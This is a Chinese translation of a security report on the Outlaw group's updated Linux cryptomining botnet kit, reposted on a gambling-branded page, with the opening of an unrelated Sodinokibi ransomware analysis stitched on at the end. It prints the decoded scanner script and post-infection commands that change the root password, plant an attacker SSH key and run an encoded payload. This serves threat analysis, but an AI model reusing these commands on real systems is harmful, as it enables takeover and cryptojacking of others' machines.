欢迎访问Sunbet官网(www.sunbet.us),Allbet欧博官网(www.ALLbetgame.us)!

首页Sunbet_新闻事件正文

Outlaw组织更新工具

e6e9fdb1a932f3282020-04-2184资讯

研究人员发现Outlaw黑客组织自7月份后沉默了一段时间现在又开始活动了。12月份的攻击活动中更新了扩展的扫描器参数和目标,通过错误消息的文件的循环执行,针对扫描活动改善了绕过技术,通过杀掉竞争和之前的挖矿机来增加挖矿收入。 

研究人员分析了该套件,发现该套件是用来从汽车、金融行业来窃取信息,在被入侵的系统中发起攻击,然后出售被窃的信息。与之前攻击活动相比,研究人员认为Outlaw更新了系统、评估了之前受感染主机的安全性,找到了新的和老的目标,还可能会测试在野的更新。

感染方法

这些新样本会利用已知漏洞来攻击Linux系统、Unix系统、有漏洞的服务器和物联网设备。此次攻击者使用CVE-2016-8655和Dirty COW漏洞利用(CVE-2016-5195)作为攻击向量来攻击未修复这些漏洞的系统。使用简单的基于PHP的web shell的文件用来攻击使用弱SSH和telnet凭证的系统。在攻击活动中,研究人员没有发现有钓鱼或社会工程攻击,但研究人员在未来中发现多个攻击。表明与特定活动相关的活动峰值的蜜罐网络图也表明扫描是分时的。

研究人员将这一举动归属为混淆技术,因为其中混淆了大量可能会被误认为是在线灰噪声的脚本活动。

Outlaw组织更新工具  资讯 第1张

图 1. 从流量中检测到的命令的异常特征

从分析的样本中,研究人员发现攻击是从一个VPS开始的,该VPS会搜索有漏洞的服务器来入侵。一旦感染,受感染系统的C2命令会发起大量扫描活动,并发送“whole kit”二进制文件来传播僵尸网络。攻击者通过对扫描器代码进行base64编码来尝试绕过流量监测。

解码后的扫描器代码如下:

,!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
mkdir .X19-unix
cd .X19-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X19-unix/.rsync/c
nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X19-unix/.rsync/initall 2>1&
exit 0

研究人员该套件是tgz格式的,同时也有一些样本伪装称png或jpg文件。之前的攻击方法利用了竞争矿工活动和不相关的组件来劫持以获利,而最新版本的代码会尝试移除与之前感染相关的文件和代码,并创建一个新的工作目录/tmp/.X19-unix来移动该套件并提取文件。然后tsm二进制文件会在后台运行,转发一系列的错误消息到/dev/null来保持代码运行,确保/tmp/up.txt中的参数集引用的代码的持续执行。然后脚本会在运行wrapper script initall前等待20分钟:

2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a  initall

Outlaw组织更新工具  资讯 第2张

图 2. 运行initall wrapper脚本

系统被成功入侵后,另一个变种会执行一系列命令。这些命令都与从受感染的机器中收集的信息相关,比如CPU核数、用户、计划任务、运行的进程、安装的操作系统、CPU和内存信息,并修改密码为/tmp/up.txt中保存的随机字符串。在之前的执行中,研究人员发现dota2有自己的文件夹,但是几乎不执行,表明该版本处在更新循环中:

cat /proc/cpuinfo | grep name | wc -l
echo "root:TXhf4ICTayIh"|chpasswd|bash
echo "321" > /var/tmp/.var03522123
rm -rf /var/tmp/.var03522123
cat /var/tmp/.var03522123 | head -n 1
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
lscpu | grep Model
echo "root 123" > /tmp/up.txt
rm -rf /var/tmp/dota*cat /var/tmp/.systemcache436621
echo "1" > /var/tmp/.systemcache436621
cat /var/tmp/.systemcache436621
sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAk.....cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3N.....

运行该脚本会移除之前攻击中遗留的文件和脚本,保持被检测到的可能性最低。如果系统之前感染过加密货币挖矿机,就会尝试杀掉运行的挖矿机和相关的活动。

根据最新样本的bashtemp目录,研究人员发现其他编译的ELF脚本,名为init和init2,会在kit中循环来保持运行:

0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6  init

Outlaw组织更新工具  资讯 第3张

图 3. 运行 init ELF脚本

93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494  init2

Outlaw组织更新工具  资讯 第4张

图 4. 运行init2 ELF脚本

init 和init2脚本会确保其他运行的挖矿服务都杀掉,并确保工作目录中的所有文件都以777权限执行。

研究人员还发现了一个运行的init0脚本,该脚本会清除源以外的所有挖矿机。

Outlaw组织更新工具  资讯 第5张

图 5. 运行的init0脚本

恶意软件会重置cron并从其他程序中移除所有的缓存文件,启用脚本和二进制文件——init0,通过修改crontab来开始和设置驻留。该二进制文件是一个要开始运行的脚本封装,一个Perl混淆的脚本来获取受感染系统的控制权。

Shellbot会将自己伪装成一个名为rsync的进程,许多基于Linux和Unix的系统中看到的二进制文件都会执行运行来备份和同步。这就使得恶意活动来绕过检测。

Outlaw组织更新工具  资讯 第6张

图 6. rsync (Shellbot)的当前变量

Outlaw组织更新工具  资讯 第7张

图 7. 连接到C2服务器来发送当前控制变量

Shellbot脚本会在受害者系统重启后加入,脚本/a/upd、/b/sync/和/c/aptitude/都会加入到crontab中。但在查看代码时,upd、sync和aptitude都会在最新版本的套件中禁用。目前还不清除这些是之前版本的遗留代码还是新加入的用作特定目的的代码。

Shellbot是用来控制僵尸网络的,有一个命令会来自C2服务器来确定shell中是否有代码执行。所有从受感染系统中收集的结果和系统信息都会在设备中本地保存一段时间,然后发送回C2服务器。

研究人员还发现基于APK和ADB的命令的痕迹,这些命令会启用基于安卓的TV的加密货币挖挖矿活动:

Outlaw组织更新工具  资讯 第8张图 8. tv.apk app的安卓manifest XML文件

本文翻译自:https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-updates-kit-to-kill-older-miner-versions-targets-more-systems/:
Sodinokibi新变种呈现定制化,疑似团伙连续作案

近日,深信服安全团队连续收到不少关于勒索病毒的求助。 经过分析排查发现,其中的勒索病毒文件相同,为Sodinokibi家族变种,且攻击痕迹也有相似之处,疑似同一伙黑客团体连续作案。 0x0 两次攻击的相似点 都创建了一个“intel”文件夹用于保存病毒文件及黑客工具: 都将病毒命名为“d.exe”并复制到启动目录: 0x1 病毒分析 动态获取程序运行所需API地址: 创建互斥量“Global\1DE3C565-E22C-8190-7A66-494816E6C5F5”,避免重复运行: 解密出加密配置信息: 配置信息为json格式文本,其包含如下信息。 豁免文件夹 "tencent fies","wechat files","perflogs","program files","mozilla","windows.old","prog